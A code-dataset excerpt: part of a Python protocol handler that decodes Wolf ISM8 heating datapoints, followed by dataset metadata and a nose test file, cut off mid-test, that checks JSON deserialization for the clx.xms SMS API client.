105: ('BM4', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
106: ('KM', 'Stoerung', 'DPT_Switch', False, ''),
107: ('KM', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
108: ('KM', 'Gesamtmodulationsgrad', 'DPT_Scaling', False, '%'),
109: ('KM', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
110: ('KM', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
111: ('KM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
112: ('KM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
113: ('KM', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
114: ('MM1', 'Stoerung', 'DPT_Switch', False, ''),
115: ('MM1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
116: (
'MM1', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
117: ('MM1', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
118: ('MM1', 'Status Ausgang A1', 'DPT_Enable', False, ''),
119: ('MM1', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
120: ('MM1', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
121: ('MM2', 'Stoerung', 'DPT_Switch', False, ''),
122: ('MM2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
123: (
'MM2', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
124: ('MM2', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
125: ('MM2', 'Status Ausgang A1', 'DPT_Enable', False, ''),
126: ('MM2', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
127: ('MM2', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
128: ('MM3', 'Stoerung', 'DPT_Switch', False, ''),
129: ('MM3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
130: (
'MM3', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
131: ('MM3', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
132: ('MM3', 'Status Ausgang A1', 'DPT_Enable', False, ''),
133: ('MM3', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
134: ('MM3', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
135: ('SM', 'Stoerung', 'DPT_Switch', False, ''),
136: ('SM', 'Warmwassertemperatur Solar 1', 'DPT_Value_Temp', False,
'C'),
137: ('SM', 'Temperatur Kollektor 1', 'DPT_Value_Temp', False, 'C'),
138: ('SM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
139: ('SM', 'Eingang E2 (Durchfluss)', 'DPT_Value_Volume_Flow', False,
'l/h'),
140: ('SM', 'Eingang E3', 'DPT_Value_Temp', False, 'C'),
141: ('SM', 'Status Solarkreispumpe SKP1', 'DPT_Switch', False, ''),
142: ('SM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
143: ('SM', 'Status Ausgang A2', 'DPT_Enable', False, ''),
144: ('SM', 'Status Ausgang A3', 'DPT_Enable', False, ''),
145: ('SM', 'Status Ausgang A4', 'DPT_Enable', False, ''),
146: ('SM', 'Durchfluss', 'DPT_Value_Volume_Flow', False, 'l/h'),
147: ('SM', 'aktuelle Leistung', 'DPT_Power', False, 'kW'),
148: ('CWL', 'Stoerung', 'DPT_Switch', False, ''),
149: ('CWL', 'Programm', 'DPT_DHWMode', True, ''),
150: ('CWL', 'Zeitprogramm 1', 'DPT_Switch', True, ''),
151: ('CWL', 'Zeitprogramm 2', 'DPT_Switch', True, ''),
152: ('CWL', 'Zeitprogramm 3', 'DPT_Switch', True, ''),
153: ('CWL', 'Intensivlueftung AN_AUS', 'DPT_Switch', True, ''),
154: ('CWL', 'Intensivlueftung Startdatum', 'DPT_Date', True, ''),
155: ('CWL', 'Intensivlueftung Enddatum', 'DPT_Date', True, ''),
156: ('CWL', 'Intensivlueftung Startzeit', 'DPT_TimeOfDay', True, ''),
157: ('CWL', 'Intensivlueftung Endzeit', 'DPT_TimeOfDay', True, ''),
158: ('CWL', 'Zeitw. Feuchteschutz AN_AUS', 'DPT_Switch', True, ''),
159: ('CWL', 'Zeitw. Feuchteschutz Startdatum', 'DPT_Date', True, ''),
160: ('CWL', 'Zeitw. Feuchteschutz Enddatum', 'DPT_Date', True, ''),
161: (
'CWL', 'Zeitw. Feuchteschutz Startzeit', 'DPT_TimeOfDay', True,
''),
162: (
'CWL', 'Zeitw. Feuchteschutz Endzeit', 'DPT_TimeOfDay', True, ''),
163: ('CWL', 'Lueftungsstufe', 'DPT_Scaling', False, '%'),
164: ('CWL', 'Ablufttemperatur', 'DPT_Value_Temp', False, 'C'),
165: ('CWL', 'Frischlufttemperatur', 'DPT_Value_Temp', False, 'C'),
166: ('CWL', 'Durchsatz Zuluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
167: ('CWL', 'Durchsatz Abluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
168: ('CWL', 'Bypass Initialisierung', 'DPT_Bool', False, ''),
169: ('CWL', 'Bypass oeffnet_offen', 'DPT_Bool', False, ''),
170: ('CWL', 'Bypass schliesst_geschlossen', 'DPT_Bool', False, ''),
171: ('CWL', 'Bypass Fehler', 'DPT_Bool', False, ''),
172: ('CWL', 'Frost Status: Init_Warte', 'DPT_Bool', False, ''),
173: ('CWL', 'Frost Status: Kein Frost', 'DPT_Bool', False, ''),
174: ('CWL', 'Frost Status: Vorwaermer', 'DPT_Bool', False, ''),
175: ('CWL', 'Frost Status: Fehler', 'DPT_Bool', False, ''),
176: ('BWL', 'Stoerung', 'DPT_Switch', False, ''),
177: ('BWL', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
178: ('BWL', 'Heizleistung', 'DPT_Power', False, 'W'),
179: ('BWL', 'Kuehlleistung', 'DPT_Power', False, 'W'),
180: ('BWL', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
181: ('BWL', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
182: ('BWL', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
183: ('BWL', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
184: ('BWL', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
185: ('BWL', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
186: ('BWL', 'Status Aux-Pumpe', 'DPT_Switch', False, ''),
187: ('BWL', '3W-Umschaltventil HZ_WW', 'DPT_OpenClose', False, ''),
188: ('BWL', '3W-Umschaltventil HZ_K', 'DPT_OpenClose', False, ''),
189: ('BWL', 'Status E-Heizung', 'DPT_Switch', False, ''),
190: ('BWL', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
191: ('BWL', 'Leistungsaufnahme', 'DPT_Power', False, 'W'),
192: ('CWL', 'Filterwarnung aktiv', 'DPT_Switch', False, '-'),
193: ('CWL', 'Filterwarnung zuruecksetzen', 'DPT_Switch', True, '-'),
194: ('BM1', '1x Warmwasserladung (gobal)', 'DPT_Switch', True, '-'),
195: ('SM', 'Tagesertrag', 'DPT_ActiveEnergy', False, 'Wh'),
196: ('SM', 'Gesamtertrag', 'DPT_ActiveEnergy_kWh', False, 'kWh'),
197: ('HG1', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
198: ('HG1', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
199: ('HG1', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
200: ('HG2', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
201: ('HG2', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
202: ('HG2', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
203: ('HG3', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
204: ('HG3', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
205: ('HG3', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
206: ('HG4', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
207: ('HG4', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
208: ('HG4', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
209: ('KM', 'Gesamtmodulationsgradvorgabe', 'DPT_Scaling', True, '%'),
210: ('KM', 'Sammlertemperaturvorgabe', 'DPT_Value_Temp', True, 'C')
}
@staticmethod
def get_device(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_DEVICE]
else:
return None
@staticmethod
def get_name(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_NAME]
else:
return None
@staticmethod
def get_type(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
else:
return None
@staticmethod
def get_unit(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_UNIT]
else:
return None
@staticmethod
def get_all_sensors():
""" returns pointer all possible values of ISM8 datapoints """
return Ism8.DATAPOINTS
def __init__(self):
self._dp_values = {}
# all the datapoint-values (IDs matching the list above) are stored
# here
self._transport = None
self._connected = False
self._LOGGER = logging.getLogger(__name__)
def factory(self):
"""
returns reference to itself for using in protocol_factory with
create_server
"""
return self
def connection_made(self, transport):
""" is called as soon as an ISM8 connects to server """
_peername = transport.get_extra_info('peername')
self._LOGGER.info("Connection from ISM8: %s", _peername)
self._transport = transport
self._connected = True
def data_received(self, data):
""" is called whenever data is ready """
_header_ptr = 0
msg_length = 0
self._LOGGER.debug('Raw data received: %s', data)
while _header_ptr < len(data):
_header_ptr = data.find(Ism8.ISM_HEADER, _header_ptr)
if _header_ptr >= 0:
if len(data[_header_ptr:]) >= 9:
# smallest processable data:
# hdr plus 5 bytes=>at least 9 bytes
msg_length = 256 * data[_header_ptr + 4] + data[
_header_ptr + 5]
# msg_length comes in bytes 4 and 5
else:
msg_length = len(data) + 1
# 2 possible outcomes here: Buffer is to short for message=>abort
# buffer is larger => than msg: process 1 message,
# then continue loop
if len(data) < _header_ptr + msg_length:
self._LOGGER.debug(
"Buffer shorter than expected / broken Message.")
self._LOGGER.debug("Discarding: %s ", data[_header_ptr:])
# setting Ptr to end of data will end loop
_header_ptr = len(data)
else:
# send ACK to ISM8 according to API: ISM Header,
# then msg-length(17), then ACK w/ 2 bytes from original msg
ack_msg = bytearray(Ism8.ISM_HEADER)
ack_msg.append(0x00)
ack_msg.append(0x11)
ack_msg.extend(Ism8.ISM_CONN_HEADER)
ack_msg.extend(Ism8.ISM_ACK)
ack_msg[12] = data[_header_ptr + 12]
ack_msg[13] = data[_header_ptr + 13]
self._LOGGER.debug('Sending ACK: %s ', ack_msg)
self._transport.write(ack_msg)
self.process_msg(
data[_header_ptr + 10:_header_ptr + msg_length])
# process message without header (first 10 bytes)
_header_ptr += msg_length
# prepare to get next message; advance Ptr to next Msg
def process_msg(self, msg):
"""
Processes received datagram(s) according to ISM8 API specification
into message length, command, values delivered
"""
max_dp = msg[4] * 256 + msg[5]
# number of DATAPOINTS are coded into bytes 4 and 5 of message
i = 0
# byte counter
dp_nbr = 1
# datapoint counter
while dp_nbr <= max_dp:
self._LOGGER.debug('DP {0:d} / {1:d} in datagram:'.format(
dp_nbr, max_dp))
dp_id = msg[i + 6] * 256 + msg[i + 7]
# dp_command = msg[i + 8]
# to be implemented for writing values to ISM8
dp_length = msg[i + 9]
dp_raw_value = bytearray(msg[i + 10:i + 10 + dp_length])
self._LOGGER.debug('Processing DP-ID %s, %s bytes: message: %s',
dp_id, dp_length, dp_raw_value)
self.decode_datapoint(dp_id, dp_length, dp_raw_value)
# now advance byte counter and datapoint counter
dp_nbr += 1
i = i + 10 + dp_length
def decode_datapoint(self, dp_id, length, raw_bytes):
"""
decodes a single value according to API;
receives raw bytes from network and
decodes them according to API data type
"""
result = 0
for single_byte in raw_bytes:
result = result * 256 + int(single_byte)
if dp_id not in Ism8.DATAPOINTS:
self._LOGGER.error("unknown datapoint: %s, data:%s",
dp_id, result)
return
dp_type = Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
if (length == 1) and dp_type in ("DPT_Switch",
"DPT_Bool",
"DPT_Enable",
"DPT_OpenClose"):
# take 1st bit and cast to Bool
self._dp_values.update({dp_id: bool(result & 1)})
elif (length == 1) and (dp_type == "DPT_HVACMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Comfort'})
elif result == 2:
self._dp_values.update({dp_id: 'Standby'})
elif result == 3:
self._dp_values.update({dp_id: 'Economy'})
elif result == 4:
self._dp_values.update({dp_id: 'Building Protection'})
elif (length == 1) and (dp_type == "DPT_Scaling"):
# take byte value and multiply by 100/255
self._dp_values.update({dp_id: 100 / 255 * result})
elif (length == 1) and (dp_type == "DPT_DHWMode"):
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'LegioProtect'})
elif result == 2:
self._dp_values.update({dp_id: 'Normal'})
elif result == 3:
self._dp_values.update({dp_id: 'Reduced'})
elif result == 4:
self._dp_values.update({dp_id: 'Off'})
elif (length == 1) and (dp_type == "DPT_HVACContrMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Heat'})
elif result == 2:
self._dp_values.update({dp_id: 'Morning Warmup'})
elif result == 3:
self._dp_values.update({dp_id: 'Cool'})
elif result == 4:
self._dp_values.update({dp_id: 'Night Purge'})
elif result == 5:
self._dp_values.update({dp_id: 'Precool'})
elif result == 6:
self._dp_values.update({dp_id: 'Off'})
elif result == 7:
self._dp_values.update({dp_id: 'Test'})
elif result == 8:
self._dp_values.update({dp_id: 'Emergency Heat'})
elif result == 9:
self._dp_values.update({dp_id: 'Fan Only'})
elif result == 10:
self._dp_values.update({dp_id: 'Free Cool'})
elif result == 11:
self._dp_values.update({dp_id: 'Ice'})
elif result == 12:
self._dp_values.update({dp_id: 'Maximum Heating Mode'})
elif result == 13:
self._dp_values.update({dp_id: 'Economic Heat/Cool Mode'})
elif result == 14:
self._dp_values.update({dp_id: 'Dehumidification'})
elif result == 15:
self._dp_values.update({dp_id: 'Calibration Mode'})
elif result == 16:
self._dp_values.update({dp_id: 'Emergency Cool Mode'})
elif result == 17:
self._dp_values.update({dp_id: 'Emergency Steam Mode'})
elif result == 20:
self._dp_values.update({dp_id: 'NoDem'})
elif (length == 2) and (dp_type in ("DPT_Value_Temp",
"DPT_Value_Tempd",
"DPT_Tempd",
"DPT_Value_Pres",
"DPT_Power",
"DPT_Value_Volume_Flow"
)):
_sign = (result & 0b1000000000000000) >> 15
_exponent = (result & 0b0111100000000000) >> 11
_mantisse = result & 0b0000011111111111
self._LOGGER.debug(
'binary format {0:b} -> s:{1:b} , m:{2:b} , e:{3:b}'
.format(result, _sign, _mantisse, _exponent))
if _sign == 1:
_mantisse = -(~(_mantisse - 1) & 0x07ff)
self._dp_values.update(
{dp_id: (0.01 * (2 ** _exponent) * _mantisse)})
elif (length == 4) and (dp_type in ("DPT_ActiveEnergy",
"DPT_ActiveEnergy_kWh"
)):
self._dp_values.update({dp_id: result})
else:
self._LOGGER.error('datatype not implemented: %s ', dp_type)
return
if dp_id in self._dp_values.keys():
self._LOGGER.debug('decoded DP %s : %s = %s\n',
dp_id, Ism8.DATAPOINTS[dp_id],
self._dp_values[dp_id])
else:
self._LOGGER.error('could not decode DP %s : %s\n',
dp_id, Ism8.DATAPOINTS[dp_id])
def connection_lost(self, exc):
"""
Is called when connection ends. closes socket.
"""
self._LOGGER.debug('ISM8 closed the connection.Stopping')
self._connected = False
self._transport.close()
def read(self, dp_id):
"""
Returns sensor value from private array of sensor-readings
"""
if dp_id in self._dp_values.keys():
return self._dp_values[dp_id]
else:
return None
if __name__ == "__main__":
_LOGGER = logging.getLogger(__name__)
logging.basicConfig()
_LOGGER.setLevel(logging.DEBUG)
# for testing purposes only, relies on debug output
myProtocol = Ism8()
for keys, values in myProtocol.get_all_sensors().items():
print("%s: %s\n" % (keys, values))
_eventloop = asyncio.get_event_loop()
coro = _eventloop.create_server(myProtocol.factory, '', 12004)
_server = _eventloop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
_LOGGER.debug('Waiting for ISM8 connection on %s',
_server.sockets[0].getsockname())
_eventloop.run_forever()
| 238 | 0 | 29 |
7c11d04529484bac5ffcaf0ec1b0a0573a4a23f4 | 18,027 | py | Python | tests/deserialize_test.py | linhuiwzqu/clxcommunications | 5f5fe593402fdb014c17fa5ef200ee9b39d42caf | [
"Apache-2.0"
] | 3 | 2018-01-23T14:18:25.000Z | 2019-02-12T07:35:37.000Z | tests/deserialize_test.py | linhuiwzqu/clxcommunications | 5f5fe593402fdb014c17fa5ef200ee9b39d42caf | [
"Apache-2.0"
] | 3 | 2017-01-20T08:23:05.000Z | 2017-01-20T10:38:10.000Z | tests/deserialize_test.py | linhuiwzqu/clxcommunications | 5f5fe593402fdb014c17fa5ef200ee9b39d42caf | [
"Apache-2.0"
] | 2 | 2019-03-07T18:33:52.000Z | 2021-06-24T01:23:03.000Z | # -*- coding: utf-8 -*-
# pylint: disable=missing-docstring
# pylint: disable=wildcard-import
# pylint: disable=unused-wildcard-import
# pylint: disable=invalid-name
from datetime import datetime
import json
from clx.xms import api, exceptions, deserialize
from nose.tools import *
from iso8601 import UTC
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
| 31.626316 | 287 | 0.552283 | # -*- coding: utf-8 -*-
# pylint: disable=missing-docstring
# pylint: disable=wildcard-import
# pylint: disable=unused-wildcard-import
# pylint: disable=invalid-name
from datetime import datetime
import json
from clx.xms import api, exceptions, deserialize
from nose.tools import *
from iso8601 import UTC
class MockResponse(object):
    """Minimal stand-in for a ``requests`` response object.

    Exposes the raw payload via ``text`` and decodes it on demand via
    ``json()``, which is all the deserializers under test need.
    """
    def __init__(self, text):
        self.text = text
    def json(self):
        """Parse and return the stored payload as JSON."""
        return json.loads(self.text)
@raises(exceptions.UnexpectedResponseException)
def test_read_invalid_json():
    """A response whose JSON decoding raises must surface as
    UnexpectedResponseException rather than a bare ValueError."""
    class _UnparsableResponse(MockResponse):
        def __init__(self):
            MockResponse.__init__(self, '{this is invalid JSON}')
        def json(self):
            raise ValueError('Bad JSON')
    deserialize.batch_result(_UnparsableResponse())
def test_read_batch_response_text():
    # A full mt_text batch payload deserializes into MtBatchTextSmsResult
    # with every field (timestamps, recipients, parameter substitutions)
    # mapped onto the corresponding attribute.
    response = MockResponse(
        """{
        "body": "${foo}${bar}",
        "canceled": true,
        "parameters": {
            "foo": {
                "123456789": "Joe",
                "987654321": "Mary",
                "default": "you"
            },
            "bar": {}
        },
        "created_at": "2016-12-01T11:03:13.192Z",
        "delivery_report": "none",
        "send_at": "2016-12-02T11:03:13.192Z",
        "expire_at": "2016-12-05T11:03:13.192Z",
        "from": "12345",
        "id": "3SD49KIOW8lL1Z5E",
        "modified_at": "2016-12-01T11:03:13Z",
        "to": [
            "987654321",
            "555555555"
        ],
        "callback_url": "https://example.com/callbacker",
        "type": "mt_text"
    }""")
    result = deserialize.batch_result(response)
    assert_is_instance(result, api.MtBatchTextSmsResult)
    assert_equal('${foo}${bar}', result.body)
    assert_true(result.canceled)
    assert_equal(
        datetime(2016, 12, 1, 11, 3, 13, 192000, UTC), result.created_at
    )
    assert_equal('none', result.delivery_report)
    assert_equal(
        datetime(2016, 12, 2, 11, 3, 13, 192000, UTC), result.send_at
    )
    assert_equal(
        datetime(2016, 12, 5, 11, 3, 13, 192000, UTC), result.expire_at
    )
    assert_equal('12345', result.sender)
    assert_equal('3SD49KIOW8lL1Z5E', result.batch_id)
    assert_equal(
        datetime(2016, 12, 1, 11, 3, 13, 0, UTC), result.modified_at
    )
    assert_equal(
        'https://example.com/callbacker', result.callback_url
    )
    assert_equal(
        {'987654321', '555555555'}, result.recipients
    )
    assert_equal(
        {
            'foo': {
                'default': 'you',
                '987654321': 'Mary',
                '123456789': 'Joe'
            },
            'bar': {}
        },
        result.parameters
    )
@raises(exceptions.UnexpectedResponseException)
def test_read_batch_response_unknown():
    """A batch payload with an unrecognized "type" value is rejected."""
    resp = MockResponse(
        """{
        "some_field": "some_value",
        "type": "mt_what"
    }""")
    deserialize.batch_result(resp)
def test_read_batches_page():
    # A paged batch listing deserializes into a page object carrying the
    # paging metadata plus one typed result (binary vs. text) per entry.
    response = MockResponse(
        """
        {
            "batches": [
                {
                    "body": "AAECAw==",
                    "canceled": false,
                    "created_at": "2016-12-14T08:15:29.969Z",
                    "delivery_report": "none",
                    "expire_at": "2016-12-17T08:15:29.969Z",
                    "from": "12345",
                    "id": "5Z8QsIRsk86f-jHB",
                    "modified_at": "2016-12-14T08:15:29.969Z",
                    "tags": [
                        "rah"
                    ],
                    "to": [
                        "987654321",
                        "123456789"
                    ],
                    "type": "mt_binary",
                    "udh": "fffefd"
                },
                {
                    "body": "Hello, world!",
                    "canceled": false,
                    "created_at": "2016-12-09T12:54:28.247Z",
                    "delivery_report": "none",
                    "expire_at": "2016-12-12T12:54:28.247Z",
                    "from": "12345",
                    "id": "4nQCc1T6Dg-R-zHX",
                    "modified_at": "2016-12-09T12:54:28.247Z",
                    "tags": [
                        "rah"
                    ],
                    "to": [
                        "987654321"
                    ],
                    "type": "mt_text"
                },
                {
                    "body": "Hello",
                    "canceled": false,
                    "created_at": "2016-12-06T11:14:37.438Z",
                    "delivery_report": "none",
                    "expire_at": "2016-12-09T11:14:37.438Z",
                    "from": "12345",
                    "id": "4G4OmwztSJbVL2bl",
                    "modified_at": "2016-12-06T11:14:37.438Z",
                    "tags": [
                        "rah1",
                        "rah2"
                    ],
                    "to": [
                        "987654321",
                        "555555555"
                    ],
                    "type": "mt_text"
                }
            ],
            "count": 7,
            "page": 0,
            "page_size": 3
        }
        """)
    result = deserialize.batches_page(response)
    assert_equal(3, result.size)
    assert_equal(0, result.page)
    assert_equal(7, result.total_size)
    assert_equal(3, len(result.content))
    assert_is_instance(result.content[0], api.MtBatchBinarySmsResult)
    assert_is_instance(result.content[1], api.MtBatchTextSmsResult)
    assert_is_instance(result.content[2], api.MtBatchTextSmsResult)
    assert_equal('5Z8QsIRsk86f-jHB', result.content[0].batch_id)
    assert_equal('4nQCc1T6Dg-R-zHX', result.content[1].batch_id)
    assert_equal('4G4OmwztSJbVL2bl', result.content[2].batch_id)
def test_read_delivery_report_summary():
    # A summary-style delivery report (no per-recipient lists) deserializes
    # with empty recipient sets on each status bucket.
    response = MockResponse(
        """
        {
            "batch_id": "3SD49KIOW8lL1Z5E",
            "statuses": [
                {
                    "code": 0,
                    "count": 2,
                    "status": "Delivered"
                },
                {
                    "code": 11,
                    "count": 1,
                    "status": "Failed"
                }
            ],
            "total_message_count": 2,
            "type": "delivery_report_sms"
        }
        """)
    result = deserialize.batch_delivery_report(response)
    assert_equal('3SD49KIOW8lL1Z5E', result.batch_id)
    assert_equal(2, result.total_message_count)
    assert_equal(2, len(result.statuses))
    assert_equal(0, result.statuses[0].code)
    assert_equal(11, result.statuses[1].code)
    assert_equal('Delivered', result.statuses[0].status)
    assert_equal('Failed', result.statuses[1].status)
    assert_equal(2, result.statuses[0].count)
    assert_equal(1, result.statuses[1].count)
    assert_equal(set(), result.statuses[0].recipients)
    assert_equal(set(), result.statuses[1].recipients)
def test_read_delivery_report_full():
    # A full delivery report carries per-status recipient lists, which must
    # surface as sets on the deserialized status buckets.
    response = MockResponse(
        """{
        "type" : "delivery_report_sms",
        "batch_id" : "4G4OmwztSJbVL2bl",
        "total_message_count" : 2,
        "statuses" : [ {
            "code" : 0,
            "status" : "Delivered",
            "count" : 1,
            "recipients" : [ "555555555" ]
        }, {
            "code" : 11,
            "status" : "Failed",
            "count" : 1,
            "recipients" : [ "987654321" ]
        } ]
    }""")
    result = deserialize.batch_delivery_report(response)
    assert_equal('4G4OmwztSJbVL2bl', result.batch_id)
    assert_equal(2, result.total_message_count)
    assert_equal(2, len(result.statuses))
    assert_equal(0, result.statuses[0].code)
    assert_equal(11, result.statuses[1].code)
    assert_equal('Delivered', result.statuses[0].status)
    assert_equal('Failed', result.statuses[1].status)
    assert_equal(1, result.statuses[0].count)
    assert_equal(1, result.statuses[1].count)
    assert_equal({'555555555'}, result.statuses[0].recipients)
    assert_equal({'987654321'}, result.statuses[1].recipients)
@raises(exceptions.UnexpectedResponseException)
def test_read_delivery_report_unknown_type():
    """A delivery report without a recognized type field is rejected."""
    deserialize.batch_delivery_report(MockResponse('{ "hello" : "value" }'))
def test_read_recipient_delivery_report():
    # A per-recipient delivery report maps all fields, including both the
    # operator timestamp and the API status timestamp.
    response = MockResponse('{"recipient":"123456789","code":11,"status":"Failed","at":"2016-12-05T16:24:23.318Z","type":"recipient_delivery_report_sms","batch_id":"3-mbA7z9wDKY76ag","operator_status_at":"2016-12-05T16:24:00.000Z","status_message":"mystatusmessage","operator":"31101"}')
    result = deserialize.batch_recipient_delivery_report(response)
    assert_equal('3-mbA7z9wDKY76ag', result.batch_id)
    assert_equal(
        datetime(2016, 12, 5, 16, 24, 0, 0, UTC), result.operator_status_at
    )
    assert_equal(
        datetime(2016, 12, 5, 16, 24, 23, 318000, UTC), result.status_at
    )
    assert_equal(api.DeliveryStatus.FAILED, result.status)
    assert_equal(11, result.code)
    assert_equal('123456789', result.recipient)
    assert_equal('mystatusmessage', result.status_message)
    assert_equal('31101', result.operator)
@raises(exceptions.UnexpectedResponseException)
def test_read_recipient_delivery_report_unknown_type():
    """A recipient delivery report of unknown type is rejected."""
    deserialize.batch_recipient_delivery_report(
        MockResponse('{ "hello" : "value" }'))
def test_read_group_result():
    # A group payload deserializes with auto-update keyword pairs exposed
    # as (first_word, second_word) tuples.
    response = MockResponse(
        """{
        "auto_update": {
            "to": "12345",
            "add": {
                "first_word": "hello",
                "second_word": "world"
            },
            "remove": {
                "first_word": "goodbye",
                "second_word": "world"
            }
        },
        "child_groups": [],
        "created_at": "2016-12-08T12:38:19.962Z",
        "id": "4cldmgEdAcBfcHW3",
        "modified_at": "2016-12-10T12:38:19.162Z",
        "name": "rah-test",
        "size": 1
    }""")
    result = deserialize.group_result(response)
    assert_equal('12345', result.auto_update.recipient)
    assert_equal(('hello', 'world'), result.auto_update.add_word_pair)
    assert_equal(('goodbye', 'world'), result.auto_update.remove_word_pair)
    assert_equal(0, len(result.child_groups))
    assert_equal(
        datetime(2016, 12, 8, 12, 38, 19, 962000, UTC), result.created_at
    )
    assert_equal('4cldmgEdAcBfcHW3', result.group_id)
    assert_equal(
        datetime(2016, 12, 10, 12, 38, 19, 162000, UTC), result.modified_at
    )
    assert_equal('rah-test', result.name)
    assert_equal(1, result.size)
def test_read_groups_page():
    # A paged group listing deserializes with paging metadata and one
    # GroupResult per entry.
    response = MockResponse(
        """
        {
            "count": 8,
            "page": 2,
            "groups": [
                {
                    "id": "4cldmgEdAcBfcHW3",
                    "name": "rah-test",
                    "size": 1,
                    "created_at": "2016-12-08T12:38:19.962Z",
                    "modified_at": "2016-12-08T12:38:19.962Z",
                    "child_groups": [],
                    "auto_update": {
                        "to": "12345"
                    }
                }
            ],
            "page_size": 1
        }
        """)
    result = deserialize.groups_page(response)
    assert_equal(1, result.size)
    assert_equal(2, result.page)
    assert_equal(8, result.total_size)
    assert_equal(1, len(result.content))
    assert_is_instance(result.content[0], api.GroupResult)
    assert_equal('4cldmgEdAcBfcHW3', result.content[0].group_id)
def test_read_group_members():
    """A group member listing deserializes into a set of MSISDN strings."""
    members = deserialize.group_members(
        MockResponse('["123456789", "987654321"]'))
    assert_equal({'987654321', '123456789'}, members)
def test_read_tags():
    """A tag listing deserializes into a set, non-ASCII tags included."""
    tag_set = deserialize.tags(MockResponse('{ "tags": ["tag1", "ัะฐะณ2"] }'))
    assert_equal({u'ัะฐะณ2', 'tag1'}, tag_set)
def test_read_error():
    """An XMS error payload maps onto the code and text attributes."""
    err = deserialize.error(MockResponse(
        """
        {
            "code": "yes_this_is_code",
            "text": "This is a text"
        }
        """))
    assert_equal('This is a text', err.text)
    assert_equal('yes_this_is_code', err.code)
def test_dry_run_with_per_recipients():
    # A dry-run result that includes per-recipient details must expose the
    # counts plus one entry per recipient with body/encoding/parts.
    response = MockResponse(
        """
        {"number_of_recipients":2,"number_of_messages":2,"per_recipient":[{"recipient":"987654321","body":"Hello","number_of_parts":1,"encoding":"text"},{"recipient":"555555555","body":"Hello","number_of_parts":1,"encoding":"text"}]}
        """)
    result = deserialize.batch_dry_run_result(response)
    assert_equal(2, result.number_of_recipients)
    assert_equal(2, result.number_of_messages)
    assert_equal('Hello', result.per_recipient[0].body)
    assert_equal(
        api.DryRunPerRecipient.ENCODING_TEXT, result.per_recipient[0].encoding
    )
    assert_equal('555555555', result.per_recipient[1].recipient)
    assert_equal(1, result.per_recipient[1].number_of_parts)
def test_dry_run_without_per_recipients():
    """A dry-run result lacking per-recipient details still exposes counts."""
    res = deserialize.batch_dry_run_result(
        MockResponse('{"number_of_recipients":2,"number_of_messages":2}'))
    assert_equal(2, res.number_of_messages)
    assert_equal(2, res.number_of_recipients)
def test_mo_binary_sms():
    # An mo_binary payload deserializes into MoBinarySms with body and UDH
